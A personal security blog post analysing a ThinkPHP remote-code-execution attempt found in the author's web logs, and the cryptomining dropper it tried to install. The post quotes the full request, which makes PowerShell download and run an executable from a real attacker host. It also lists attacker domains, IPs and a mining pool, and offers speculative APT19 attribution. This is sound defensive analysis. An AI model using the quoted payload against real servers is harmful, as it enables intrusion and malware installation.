Hi everyone !
As you may know, I’m not joking with cybersecurity. Which means I’m not joking with the blog. That being said, a good way to ensure the safety of its own equipment is to periodically peel the log files.
1°) The Context
A few days ago, I noticed that more than 50% of http requests received to my website are not actually visitors but hosts targeting the entire internet for vulnerable servers. This is called “mass attacks”.
Even if they could be impressive, these mass attacks are very unsophisticated and good practices are generally more than enough to make it meaningless.
However, there was this request, punctual, and quite sophisticated:
220.127.116.11 - - [02 /Apr /2019: 17: 17: 41 +0200] "GET /public/index.php?s=index/thinkx5Capp/invokefunction&function=call_user_func_array&vars=system& ; vars   = cmd.exe% 20 /c% 20powershell% 20 (new-object 20System.Net.WebClient%).DownloadFile ( 'http://fid.hognoob.se/download.exe', ' C: /Windows/temp/fbouucstzfhszdw10280.exe '); start% 20C: /Windows/temp/fbouucstzfhszdw10280.exe HTTP /1.1 "301 5" http://blog.tchernobyl.ml/public/index.php?s= index /thinkx5Capp /invokefunction & function = call_user_func_array & vars  = system & vars   = cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile ('http: //fid. hognoob.se/download.exe','C:/Windows/temp/fbouucstzfhszdw10280.exe');start C: /Windows/temp/fbouucstzfhszdw10280.exe "" Mozilla /4.0 (compatible; MSIE 9.0; Windows NT 6.1) "
To make it simple, this request attempts to execute a powershell command through "index.php". If the server is vulnerable, a file is downloaded, executed in memory and then deleted from disk to cover up traces.
After some verifications, it would be proof of concept on a "ThinkPHP" vulnerability. It's a PHP-based web application development framework distributed under the open source Apache2 license. This framework is very popular in China, where more than 40,000 servers are running ThinkPHP ( source )
2°) The Dropper
First of all, the file is pretty lightweight (only 90 KB) which could mean that this is only a dropper. After being executed, it would download the real payload. This kind of process is widely used by hackers to facilitate and control the execution flow.
At this point, the least we can say is that the individuals who wrote this piece of code are far from being beginners. Although I know that the program was written in C++ by looking at which libraries are loaded, I can't unfortunately say anything else about the development context. For instance, there is no debug artifacts, no comments, nothing at all except the code. Which is rare enough to emphasize it.
Thus, this file succesfully passes the 6th statement of the CIA Development Tradecraft:
Raise the difficulty for analysis and reverse-engineering and removes artifacts used for attribution/origination.
3°) The payload
During the execution, two other files are successively downloaded and executed: nmbsawer.exe and wercplshost.exe.
One file provide persistent remote access (cmd.exe) and disables Windows Defender protection and the other one provide a cryptocurrency mining tool. I managed to identify the mining pool with a configuration file: pxi.hognoob.se:35791. Fun fact, the mining program is configured to use only 1% of the CPU load.
It seems a little strange to set up the mining rate so low, but keep in mind that servers running on processors costing $ 14.000 each, 1% of the load is actually far from being nothing !
Altogether, there are 6 subdomains involved in this operation:
upa1.hognoob.se 18.104.22.168 ----> additional components downloaded by the dropper (SERVER A)
upa2.hognoob.se 22.214.171.124 ----> additional components downloaded by the dropper (SERVER A)
q1a.hognoob.se 126.96.36.199 ----> additional components downloaded by the dropper (SERVER A)
uio.hognoob.se 188.8.131.52 ----> ??? (SERVER C)
fid.hognoob.se 184.108.40.206 ----> initial download of the dropper (SERVER A)
pxi.hognoob.se 220.127.116.11 ----> mining pool (SERVER B)
Interestingly, some subdomains are "protected" by Cloudflare. I put "protected" with quotes because this "protection" allowed me to get the IP addresses without any problem.
When we have all the IP addresses (which are three), we realize very quickly that all addresses are located in Russia. All except one:
http://2019.ip138.com/ic.asp 18.104.22.168 ----> Control and Command (SERVER D)
This web address located in China is hard coded into an additional monitoring component downloaded by the dropper. This suggests that this is the address of the Control and Control server. In addition, the extension "asp" reinforces the hypothesis of a Web control on the botnet.
You can also that "2019" in the subdomain name. After some researches, I found that each operation had its own subdomain depending on the year. The oldest I could manage to find is dating back to 2017.
Although nothing allows us to say that this is an attack orchestrated by Russian hackers, it is obvious that most of the operation infrastructure is located in Russia.
The fact that the biggest benefit of the operation is in China and the coincidence to have a vital server to the operation being also located in China is a bit intriguing.
Even more intriguing is the fact that the domain used for the C&C would be attributed to APT 19 . Also known as the sweet name of "Codoso Team" or "Sunshop Group". It would be a group of independent hackers who would benefit from some form of support from the Chinese government ( source)
In short, this is where my little investigations led me to learn a little more about these hackers of the shadows who are so well-known and so unknown at the same time.
I hope you liked this article, feel free to send me messages via the contact form or even in comments to give me your point of view,or if you knew the same situation / a similar situation, I read them all! 🤠